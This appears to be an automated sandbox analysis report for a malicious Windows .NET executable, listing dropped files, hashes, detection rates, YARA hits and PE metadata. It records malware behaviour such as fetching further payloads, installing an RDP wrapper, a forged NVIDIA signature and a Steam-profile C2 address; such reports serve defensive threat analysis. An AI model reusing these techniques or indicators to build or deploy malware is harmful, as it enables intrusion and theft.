SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EBAAFCAFCB.exe.log

Download File

Process:	C:\ProgramData\EBAAFCAFCB.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JKEHIIJJEC.exe.log

Download File

Process:	C:\ProgramData\JKEHIIJJEC.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1081
Entropy (8bit):	5.3495313663879385
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeBE4D2ca:MxHKlYHKh3oPtHo6hAHKzeBHCJ
MD5:	D9A01D6A41EC5AA7A4194CF10BC63F73
SHA1:	65D36393787E66A8CE9E7845CCD76A2EF9575FCB
SHA-256:	A4321903A0AF8F49D85FF181BE8FF2E9053F0A64501541284D78E19D41B578F2
SHA-512:	CC127819B3D9A7E24FD6C0183AD06A8AE7B3C7F3D3A8E8F29CCED78BDD428745E71B89EE481689073B03A09F026975D4A64F749B95FE945AF283202AB8C96BB1
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Di

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\KECGDBFCBK.exe.log

Download File

Process:	C:\ProgramData\KECGDBFCBK.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199780418869[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.399004981277167
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2S0:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFp
MD5:	B2989F9B6BEB5781C7E8C142FD556184
SHA1:	6D48C217A19A2D9785EFA6A25572F5AD2FC3E837
SHA-256:	0A5B12ECC5E7CFB59E4140700F8EE0C579C3FC9FF29D81946E1C5C8F3EA09F32
SHA-512:	993044100DAE8539B50B99B6E7EA8ADF60FF122C172A1E074EB55E19F30A36FB3A5B12A4916F3E175D787F68F24A6E1E264AF8B27857CC549FCEA12C380482D6
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199780418869[2].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34725
Entropy (8bit):	5.398626668217886
Encrypted:	false
SSDEEP:	768:udpqme0Ih3tAA6WGA2fcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2Sd:ud8me0Ih3tAA6WGA2FhTBv++nIjBtPFU
MD5:	0403DA5841F73E60C5C91979253F280C
SHA1:	23F619632EC66F0AE6D4CB8911151A29AF36565B
SHA-256:	620EC1D700582D6F41EB3381725447B3C2A2C283A93A581FD8156E5C15DF05F6
SHA-512:	9A671AE07DF3218C520EB6B04C3B15BB0C5200B78EB72266EC8951356D39BB2F7DCF2DDCD3090E3F5B3D10DFC7D456D3FA464D4B476C9BFF8CF3A3FB10415546
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://5.75.211.162\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5db9e54794_vfkagks[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.989371105778008
Encrypted:	false
SSDEEP:	12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
MD5:	F73186DF5A030CF7F186B0737C3AF1F7
SHA1:	D15E45FEEFBBC010DB92AE897D80BC7419C0D046
SHA-256:	05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207
SHA-512:	A6E4D6E34748FA8FB9153E2104CF49CC36AF9B22E29C8DF050DE0DB4E14E9DD18ED178B4BBACD6289A0A55B465C996FB931799BA970DFE559C85215DB7E31DF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0...............................................................^.8=..Q..v A.3[R.J.._....f..9.\l..vC#SsnB~.E..~.i..7.}+.V...#..8..f.#XW....b...(..............<O.......1.$.=UN8.)..LL....(K....,r.....%9.L.Y.=0..T4.&.....d....(U....'="...(>.d..+..92...p8.1..Pa\q....]X./a.@0C.PQ...B...v..6....le2....4I3.......P.C:...v.}.Q.wp..S(A.Qg.'..N.._X.mvg...J/J6.^...D^MI.O4.5.+....e...^.DIf?.1$;7..x...M..q.q.{'...I..CN.n...a.P.8....!0..\.^.'...3.._....,\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5dbaca34ac_lfdnsafnds[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.98819744237574
Encrypted:	false
SSDEEP:	6144:bymTbhLAP1TbvdrXIFTjCUBfmfq1VpIe+kUWLD38DEVhyF2tLooTPbJBJaINPK7z:bymTiJVr4FTjCUVsq1we++D3FU2CW7aT
MD5:	47697A60A96C5ADEF362D8DA9A274B7D
SHA1:	16DBC512F121C27E2CB48A61D6DCF166AA792E0D
SHA-256:	63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA
SHA-512:	4F18DB753FBD9F08842630DD2AC97DC6B368269C80DFC8A2F880BAA80010DB013C8168A6C19465F5D843AE135B162A63EB2DC1C48EA93C5B255868C77C591A17
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 43%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................y.YYl.v^...5f.H$...../.W.a.zz..5O..7...f..S.l\.RB.k.5...Eq.....v......B...f............9v...;(.F. .J.g.i..(....B.B.M.s...<..ub. .l.].....Qg...\.Bc.....$........fVGZ.........8....lH;!..."......p.UO.8.Y"....d..\...dD".sm}.c#.?.4?..Y#.......0....VS..X..\|....G...g.:!rM[~...e.Bp..bz.{....`5......\|..\|b.O....G......A.h...}s8...W.PaG?...U.K%.9].\|.....wc\\|..B..K=.D..u..G.@..q...y0g...5..i.......<

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5de72d9ebd_rdp[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	7.6533863237352735
Encrypted:	false
SSDEEP:	1536:a7xe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/prrDDhLO6kiz:a7x0I26z/8uz22gaxH2zpXD1O6Jz
MD5:	3FCBAACCA9CC6DCCF0649F5ABB8B73EB
SHA1:	B0C5D6768B041C992DB13ADBF9D1152EAE2DCFE4
SHA-256:	A50E7F2B8528539D7F9EEE179010F35C20AD3854E773E40A98023D594113653A
SHA-512:	055313B85862F58573A589785B3D6A63FF41B105FD78BD7956DFF7EC532075CC03954AE492F50562ED5FAA6850656570A22552C75A5E47EA768CED8893768AC6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5de72d9ebd_rdp[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..............#... ...@....@.. ....................................`..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H............&...........-...............................................(#.....(....6.\|.....(0...Vs1...r...p(....(2...Js1....s3....(4...Zr...p(....(.....oE.....(N...:....r...p(.....r0..p(....(O...(.....r...p(....(....r...p(....oE...:....r...p(....r...p(.....r...p(.....{....r...p(....(X...oY...(Z...b.:....rZ..p(.....o[....0..n.........(.....s....(....r...po....(.....s.......o.......o.......o......o..........io.......o.....(......o......+......0../.........(....}

C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Download File

Process:	C:\ProgramData\JKEHIIJJEC.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	1785344
Entropy (8bit):	6.646511331349125
Encrypted:	false
SSDEEP:	24576:+rKxoVT2iXc+IZP+6WiaTAsN/3ebTvK+63CWH8iA/iD2hgPjcC8SVdKumYr7:vHZGpdqYH8ia6GcKuR7
MD5:	C213162C86BB943BCDF91B3DF381D2F6
SHA1:	8EC200E2D836354A62F16CDB3EED4BB760165425
SHA-256:	AC91B2A2DB1909A2C166E243391846AD8D9EDE2C6FCFD33B60ACF599E48F9AFC
SHA-512:	B3EAD28BB1F4B87B0C36C129864A8AF34FC11E5E9FEAA047D4CA0525BEC379D07C8EFEE259EDE8832B65B3C03EF4396C9202989249199F7037D56439187F147B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...#.CZ.................4..........<7.......P....@..............................................@...................................`...{.......................^...................................................................................text... ........................... ..`.itext..\|....0... .................. ..`.data...x....P.......8..............@....bss.....O...p.......L...................idata...............L..............@....tls.................`...................rdata...............`..............@..@.reloc...^.......`...b..............@..B.rsrc....{...`...\|..................@..@.............p......................@..@................................................................................................

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:mNN000000000000000000000000000000000000000000000000000000000000r:oV
MD5:	C534003482728976DF00C17A1E3D3323
SHA1:	044357E5B13981D1A407038FCC16F1F65F6B1FEA
SHA-256:	1F975A96935F3C425A07A4A25A981172528DE1A56D4E2EB5CE934FCEA366342D
SHA-512:	7E8F9408C90EBCF4880DF52A5725185BFF52F2764168AA9136A67CB27F23EB6DDB0B7C0D38CA395BE0D7D4CE247D5714C89CDFD72277AF5B1C12E1932463AB68
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\rfxvmt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	7
Entropy (8bit):	2.2359263506290326
Encrypted:	false
SSDEEP:	3:t:t
MD5:	F1CA165C0DA831C9A17D08C4DECBD114
SHA1:	D750F8260312A40968458169B496C40DACC751CA
SHA-256:	ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
SHA-512:	052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
Malicious:	false
Preview:	Ok.....

**\Device\Mup\045012*\MAILSLOT\NET\NETLOGON**

Download File

Process:	C:\ProgramData\JKEHIIJJEC.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	3.607563206984032
Encrypted:	false
SSDEEP:	3:bHI2Y1AnXoXll8lLn:4GX4qLn
MD5:	4523E905EBF8EE030844F481979B070E
SHA1:	BEB4CC6EDA9C33B9E73A1A686DA2EC0FB4B32970
SHA-256:	25F54FAAB3BF51959A6908FEA33736FB2EDCBD73C55301251F99A309FE953A6E
SHA-512:	75FF147C31D29BE6CFA5029AD76A12197E0438C78603D6B0134F1B2D1965DE892CACC8C4D7C92E85FFB7C2DBD64C971D9322F7F62953FEEBD8C5337D18B5A61F
Malicious:	false
Preview:	....0.4.5.0.1.2.....\MAILSLOT\NET\GETDC4FE0626A.................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.989455483270312
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	413'224 bytes
MD5:	252a19a2ffc2aaee5ed5d3f84ba30d38
SHA1:	7f4772d99549926dc85744656e339d8aea46a414
SHA256:	6335282918d5ab79ed7704a1dc655915f829c435997e31d20780d6eda030a440
SHA512:	14b6a0ca204ce260a66b9d6c1b95f52bd8b3e618fd10ebbcdf4ee3a83812a2ebdc5a9a0b65c048b99f9a710b9d4265d4a1b41edaf82141a02256aebadf8a71db
SSDEEP:	12288:cekXGMQ2zoxTMB6hbaJpbyLDFUGKpg1rUH7XoOEO:cecL8dMB6hgpbwDY+KXoOt
TLSH:	FA9423F55DEF463CC24809B0F6D43B65B632B753B829A08FF499A8E719293200F59B35
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x463c3e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F5DAFE [Thu Sep 26 22:06:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x63be8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0x5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x62800	0x2628
